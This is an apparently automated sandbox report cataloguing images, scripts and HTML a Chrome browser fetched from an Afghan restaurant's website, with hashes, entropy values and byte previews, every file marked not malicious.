                                                                                                                                                    Preview:............ .h.......(....... ..... .......................................................................................................................................................................................%..........................................................$..*c..1s.. .......................................[~......)...............?/..........BY........................../4k...J...2.'),.....'),.'),.%%Y......1Y..............................m..........(),7xzun..........................................*.5 ..........wtsh'),.........>............................{....Q.........'),.....'),.'),..............3...............................-......'),.'),......D..:...0...........................Cbt...#...................".%!....\..!!.............................<;......=...i...m...G.......3/...4.................................O..............<.+ .........-..................................................r.......................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (8385)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):8415
                                                                                                                                                    Entropy (8bit):5.104931068425687
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:UrZgL1xvPV6GqKgR6TYLWHFMLJA6pOROVEE1fosvGeaMozHImBaoqbl:Ury9PVfIFrlAJROVEEdos+eatzHILoA
                                                                                                                                                    MD5:36050285BFEEB7395752F0F9BBC08273
                                                                                                                                                    SHA1:5924F7BBBF1DFA3F0926851D01F782F23A59E805
                                                                                                                                                    SHA-256:0EC632E6AB02D4FDD514DA7F5EDC74AA28C9D4C71AF76F1C8B93A1FBA85BCC69
                                                                                                                                                    SHA-512:BF887E087C52583114B77BFB417D7DFFA0EE8634D39155AF14591A24B2ADD9EF4C8A0C0555364122800D07A55F5F1FB0C723B39541B069A437FF558DDBF380A3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/vendors/wow/wow.js
                                                                                                                                                    Preview:/*! WOW - v1.1.3 - 2016-05-06.* Copyright (c) 2016 Matthieu Aussaguel;*/(function(){var a,b,c,d,e,f=function(a,b){return function(){return a.apply(b,arguments)}},g=[].indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(b in this&&this[b]===a)return b;return-1};b=function(){function a(){}return a.prototype.extend=function(a,b){var c,d;for(c in b)d=b[c],null==a[c]&&(a[c]=d);return a},a.prototype.isMobile=function(a){return/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(a)},a.prototype.createEvent=function(a,b,c,d){var e;return null==b&&(b=!1),null==c&&(c=!1),null==d&&(d=null),null!=document.createEvent?(e=document.createEvent("CustomEvent"),e.initCustomEvent(a,b,c,d)):null!=document.createEventObject?(e=document.createEventObject(),e.eventType=a):e.eventName=a,e},a.prototype.emitEvent=function(a,b){return null!=a.dispatchEvent?a.dispatchEvent(b):b in(null!=a)?a[b]():"on"+b in(null!=a)?a["on"+b]():void 0},a.prototype.addEvent=function(a,b,c){return null!=a.addE
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):230393
                                                                                                                                                    Entropy (8bit):7.955511657686626
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:61R1S6jvvtV1STrBUJbd+iUcMRDFEkLwjjmDsBZ:63QSiBUJbd+irMRDFEvjuk
                                                                                                                                                    MD5:75D6E3EBEBBCDE6515E4CB93E9A7A690
                                                                                                                                                    SHA1:D13C2221E7F318F3CF511C5C26AE8B659E70332E
                                                                                                                                                    SHA-256:645007265CDB75D27B4280187324934A1EC0CB0BF6AE43D7B8143433F6CE597E
                                                                                                                                                    SHA-512:83BE394AF0D578BD31AF8115FDE1CD9739CC948F1F198EF6CA5DC9B038416D3B08357C8C92FE3FB17533CB080DF561AE68B5924E652329DA8CAFC7BEDDA4B766
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....$.Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:41:47....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................49..........49..........49..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................P........2023:08:19 16:48:45.2023:08:19 16:48:45.+10:00.+10:00.+10:00...`..........................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):142133
                                                                                                                                                    Entropy (8bit):7.918517530333488
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:TVmnVm2CXEXhSc5Yu6F8WZ2q7YCdvKtM9Da/uqO7:ZuXXQcWp81CdvKt8EuR
                                                                                                                                                    MD5:4609E9B0A726D1206CD05619AA0A6352
                                                                                                                                                    SHA1:2FC1B1DA5EB5EDE41570CD5E268B3F7D809E7682
                                                                                                                                                    SHA-256:E8AF7D8F8C439618E35F3E0016F7611EFBC683C92563D47CA84E4EA2484CD4C9
                                                                                                                                                    SHA-512:57F01855748750EE2F86C99E256C55ACB653FD852CE096E8107BF5B7C25C640FD2BE8E4D56D6748C5EFCF01EDFCA646855E6D09314752D7E648D909E31FEA5C9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N2.jpg
                                                                                                                                                    Preview:....)DExif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:42:44....)...........2...........:."...........'.......@...0...........2.........@........0231...........B...........V...........j...........q...........x........................................................................................................86..........86..........86..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................d...8....2023:08:19 15:27:56.2023:08:19 15:27:56.+10:00.+10:00.+10:00............................%.................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7389), with CRLF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):23118
                                                                                                                                                    Entropy (8bit):5.597206570281448
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:gYDyyzVrxr7oprW352OAYQ1dTzLBrrobv75fld1qmSF2/L2OAYQ1dTzLBrrobv7Q:VDygrc852zYQ1dTztrrobv75fld1qmSF
                                                                                                                                                    MD5:D1ADFE353E622045AFE7215839301992
                                                                                                                                                    SHA1:6E591F93BAC0620E80F593BD972D1090B337D17F
                                                                                                                                                    SHA-256:CDD3A7C74B588F974F832CF16BF0F2C0BEB9B3C965FAB2B8123E68BE7A11FD37
                                                                                                                                                    SHA-512:C49A3570D9EC0392BA76365AF614B31CE5EB6DCC8281148EDB3B26BBCE7A8D68560BFE55CB145DAA2F422B72E6EDC58132D54DA1C7029F7CB069581900A380A8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/aboutUs
                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta name="author" content="AdagraPro">.. <title>Afghan Hayat Restaurant</title>.. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />.... font icons -->.. <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">.. <link rel="stylesheet" href="assets/vendors/animate/animate.css">.... Bootstrap + FoodHut main styles -->...<link rel="stylesheet" href="assets/css/foodhut.css">.. <link rel="stylesheet" href="assets/css/custom.css">.... Google font styles -->.. <link rel="preconnect" href="https://fonts.googleapis.com">.. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.. <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&displ
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):84519
                                                                                                                                                    Entropy (8bit):7.362853143856596
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:XwNaGSIiv9M1bNQJ054Arplz/ZSxpMcWir62rpbV8z1C:3GSPMD5vLTZWLJpwC
                                                                                                                                                    MD5:814FA8AE7E9E83E8BCABCE6795DCF059
                                                                                                                                                    SHA1:EDFAC4CF8DC5C88ECD2BB0C14D26850403084CE1
                                                                                                                                                    SHA-256:9DF93DF6F7CA991AB7E8C88B141D679B5989358917683F612564D050DEB5BDE0
                                                                                                                                                    SHA-512:6BD9D24F1F55101E9272747FEBD2E36AA581E63F50E43A6CB9CCF78B9DBD1C7C9CD9FF6CB81849FF7A4E7FFE222951986804D801B21A4916330217AE3F58D9C0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:0e66a276-0cae-11ed-a552-baea9d3ae441</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:437dfe83-6d85-8b
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 103 x 78, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):39783
                                                                                                                                                    Entropy (8bit):6.06457614718952
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:ZidDidRrRU5Ry5lcG6tt+uPK5EziMT6oh2l:ML0SGvQK5EziTohU
                                                                                                                                                    MD5:2B80D5E8FCC6B7E93268C2B287F09E8C
                                                                                                                                                    SHA1:D9EFF5E9FB95B317B48968E1C2426345EBF6CB98
                                                                                                                                                    SHA-256:F6650E945A745083A5ADA2B3958042A6DE46377A5E98F17FF2B786DA0B7CF18B
                                                                                                                                                    SHA-512:ABDEB5EEE6681BB299C3E8F96FB3F3549437930A77A76AD67E3462EFF5DD08744A5A74141A9D6BF9694ABD869348AB34F87BE900AFFB50E4BD9026E31A6831B8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...g...N.....=.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=949, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1227], progressive, precision 8, 870x910, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):189380
                                                                                                                                                    Entropy (8bit):7.957979804573264
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:/fUlCfUlQnyTUKDRbctw+2mhEvM+qG+U2dwt474manSFwO017PSO92x1n7nvoRNw:03myAKZhmhEvMzFd/8b17PSO92v7ARhk
                                                                                                                                                    MD5:B85B7939682A2F5D0A16E2E9BE426F05
                                                                                                                                                    SHA1:EFD069F15B6F757573A055085D21D763EA84B4AE
                                                                                                                                                    SHA-256:A6A1B9AE4CFE9F3A619AA761D548D3445E5387D4D4533F3AA5EFBB8CE02618C0
                                                                                                                                                    SHA-512:9E56C2C2B28B3F216FF5CFD848FC9E687E51C86BEEA4F56C47765E5414F0C78D5536D7D28DF70947AE84FF4AF4F2B7A18F60133892022E1A2D9B3C9761ECF8E7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/res_menu.jpg
                                                                                                                                                    Preview:....4]Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 15:28:42.............0221.......................f...........................................r...........z.(................................2........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...N.:..fU..e...ce.}g}....l.V........p.@gM.'.X>...V.i..jrs.....nX...{......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 129 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):43957
                                                                                                                                                    Entropy (8bit):6.313206340886888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:kidDi9EU5QH2s5+MRtNDfSdR0izQTI+zg7UkCJ:TvWs5+etNDKdR0yR++E
                                                                                                                                                    MD5:E186BEE2FC9AB88529477DF11E46E5BD
                                                                                                                                                    SHA1:942AC36329E109BC75DD016B602BEE29F7D0C279
                                                                                                                                                    SHA-256:DF2C61F3F21961B8F135F1A1CE4DD37E23A2DBFD0401E2028B61E5CD6AD30C05
                                                                                                                                                    SHA-512:BBCBD7399DB42113C5B7D782AAE68AD32D6BCBE7329D2090B5DF548DF8EC8AA7B033989516661BC2B84B106FC2AB434B6256AC23A18A1C5E943B61F09A6CCCD3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Chicken_Korma.png
                                                                                                                                                    Preview:.PNG........IHDR.......K.....W......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 372 x 423, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):171446
                                                                                                                                                    Entropy (8bit):7.768226046897046
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:sasQe4bitSPO085vJUJu+X786mLrvszwERoLC0U2OE93reMi8B/TBU9:sasJX4OdxJCFmUzw5LCtEFiqhi9
                                                                                                                                                    MD5:A3CADB2708A187A69E319BA0A48DE0AA
                                                                                                                                                    SHA1:331B700E967307D396F0BC6C2CBA74ECBBE8689A
                                                                                                                                                    SHA-256:2FCFBD69260608D7B3DC2091A7E4784CEA854148C87717D9F956FDAE85ED4B88
                                                                                                                                                    SHA-512:F958DDE84379A785D3E9602206E1AD1873895D98272FE829931F57AC69C773602235D8DEED5DD670CA5F4A8E2AB63B07A2DACDFCA072CEE0F0454BE932AA3E90
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...t................pHYs..!...!........9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2023-09-26T15:46:31+05:30</xmp:CreateDate>. <xmp:ModifyDate>2023-09-26T15:55:48+05:30</xmp:ModifyDate>. <xmp:M
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (2406)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):78365
                                                                                                                                                    Entropy (8bit):5.456753311036989
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:o/oPKW2/xQEiuVQf4bLR5dz34pkpZZvqxdESTsBKX4cg6KlJHkOV5FdaJC03Xu2i:uoPK//xQEiuVQf4btr32MZdqxGSgBKXQ
                                                                                                                                                    MD5:9E43F550A52998CA7A0FD723D116582E
                                                                                                                                                    SHA1:C6E39D9DFD56C38AA062CACF979D690C44E03C0F
                                                                                                                                                    SHA-256:311E9E8A1ABDA5299C796E9DE880B4589FC5D52C72C0317DC5FF789B7929066F
                                                                                                                                                    SHA-512:F759B63313B11E34815FE52186D31B6F1C9DC7B4A9D7D5425B5BF3048F5C005C85EFC044C342EF8B8A2B068FAE418EC0F44BEC148B59A29E2F40354DCB2F5C57
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/map.js
                                                                                                                                                    Preview:google.maps.__gjsload__('map', function(_){var Gva=function(){var a=_.dr();return _.gi(a.Gg,18)},Hva=function(){var a=_.dr();return _.H(a.Gg,17)},Iva=function(a,b){return a.Eg?new _.cm(b.Eg,b.Fg):_.dm(a,_.lr(_.mr(a,b)))},Jva=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Kva=function(a,b){const c=a.length,d=typeof a==="string"?a.split(""):a;for(let e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return e;return-1},Lva=function(a){return new Promise((b,.c)=>{window.requestAnimationFrame(()=>{try{a?_.Km(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attempt.")):c(Error("Error focusing element: null element cannot be focused"))}catch(d){c(d)}})})},Mva=function(a,b){a.Fg.has(b);return new _.gra(()=>{Date.now()>=a.Ig&&a.reset();a.Eg.has(b)||a.Hg.has(b)?a.Eg.has(b)&&!a.Hg.has(b)&&a.Eg.set(b,"over_ttl"):(a.Eg.set(b,_.Dn()),a.Hg.add(b));r
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 116 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):38154
                                                                                                                                                    Entropy (8bit):5.958781621243104
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:250wAdDiJks5mU51j/dgM7pHwzSXTcrg4bDS6ru/N6taj3LIcs3ZGKEAgj2lo7:MidDiJgU51jO8wITfAru/gtaYc8GKEf5
                                                                                                                                                    MD5:CDDFE74CBBB4F5E5C256E8CDE3EAECA6
                                                                                                                                                    SHA1:7B11744C35038255925FB7F1F654400EE90DFFEF
                                                                                                                                                    SHA-256:252A75D08EF40539F3217D8B9CEB255AAA72A625E12CC61C16C11BA177F30D84
                                                                                                                                                    SHA-512:8A3D53C43EF23D508D3ED8FFCFCB681D7D94981DCA721AEAA71F878A7060ACA4B14002CCD694A0A3EBE7D7B014454AE7FBB5ED1576C805229120414320AE1376
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Lamb_Karae.png
                                                                                                                                                    Preview:.PNG........IHDR...t...K........_....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):124316
                                                                                                                                                    Entropy (8bit):7.9290097513255295
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:7n1J+ln1J+lLB4YtzKZ1Whf9VVhC1gXceAAPOVeQ9KdBqIZrRqDv0QJViNy:7n1Wn1QV46mZMrho2XwCZrRJ8Ek
                                                                                                                                                    MD5:BD3152310CC1D82F5900D4F35C76ED3B
                                                                                                                                                    SHA1:189F9E58B3E395AD10FF269A9D5E1BC03B594144
                                                                                                                                                    SHA-256:DF42AD1CAC18EF2B4580A719F56BED2A92D6431970ED4E43FF51628A17CF306F
                                                                                                                                                    SHA-512:F7696DC5CB0D499B4A627337933AB97AE1216BBEEF82FF15D1F995C6C752684FE04DB1848D63A0A45CF939D0E83E7B7406605BFF1B4E8C578B6BED65449D0B3E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....%.Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:09:21.............0221...................................................................r...........z.(................................$].......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...K.....- ......m......3....x....Xu....09....%..k..u.?...5f.......#.j..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=309, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=550], progressive, precision 8, 700x373, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):68922
                                                                                                                                                    Entropy (8bit):7.864406537417125
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:RNQNCY3IXdRrxyyiI+pM+2xAzVCoJ9Q1gDm4SOi:Ra4X3Zia8PJ9QCDm46
                                                                                                                                                    MD5:954FBB5B7016EE82B80C6FCD78A20190
                                                                                                                                                    SHA1:66F814C811773535422B25702E8E31679E3F52D7
                                                                                                                                                    SHA-256:B8D40DF2797FCA2B098A69A9C641B03F50AA4EBEEC78C3ABED16F5EEB637B816
                                                                                                                                                    SHA-512:4BF39F44378DB04603FD0D3723A35CBD541932B3EF96D2DC35D2B7FCA1275CFC61ACA19C2243D0E86B711F97332F2A8F1FCEBEE5A8D2239384B1AECD50952441
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...............&...........5...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:16:25.............0221...................................u...............................r...........z.(.................................V.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................U...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..+...!.;...;f....=..........[v4.kI.........cF.nT.....s..G...........M..m...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 85 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):43281
                                                                                                                                                    Entropy (8bit):6.275938679361991
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:u5dDi+xU5fes494FS0UbZr+3CCfjUCKt+Sl:0ces4mF1Ub1+SCL+t5l
                                                                                                                                                    MD5:95A3BE1BB2B854101DB5C1A44052C137
                                                                                                                                                    SHA1:A05BA5B0AA5D8C3168E637FFF5C1D37EFF9CF70A
                                                                                                                                                    SHA-256:9B8F3F0C879BD4B5428653ED691A3F126C673B2E9CE5847C66FA32BFD8477A1E
                                                                                                                                                    SHA-512:6CFA8B936B492849D01A82D6570F424EA79E60318004CC52928EBE733278589BF3141929CA20ED711AE27C14DDF79422F876BB4165B7C7D79F4DDCB282836777
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
